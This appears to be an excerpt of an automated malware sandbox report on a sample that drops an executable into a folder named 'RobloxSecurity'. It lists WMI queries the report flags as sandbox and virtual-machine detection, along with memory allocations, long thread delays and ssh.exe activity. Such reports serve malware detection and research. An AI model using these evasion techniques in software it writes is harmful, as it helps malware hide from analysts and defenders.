                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeMemory allocated: 1F996210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeMemory allocated: 1F9AFDF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1B8A9DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1B8C3950000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 10DD58D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 10DEF3F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 17A71580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 17A73090000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1EC01810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1EC199B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 167CFD40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 167E9760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1CF0AE90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1CF24830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599297Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598000Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597665Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598984
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598656
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 598107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597970
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597844
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeWindow / User API: threadDelayed 524Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6412Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2335Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 3339Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 6279Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 6523
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow / User API: threadDelayed 2597
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 6496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 1184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599641s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599407s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -598000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597781s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597665s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852Thread sleep time: -597094s >= -30000sJump to behavior
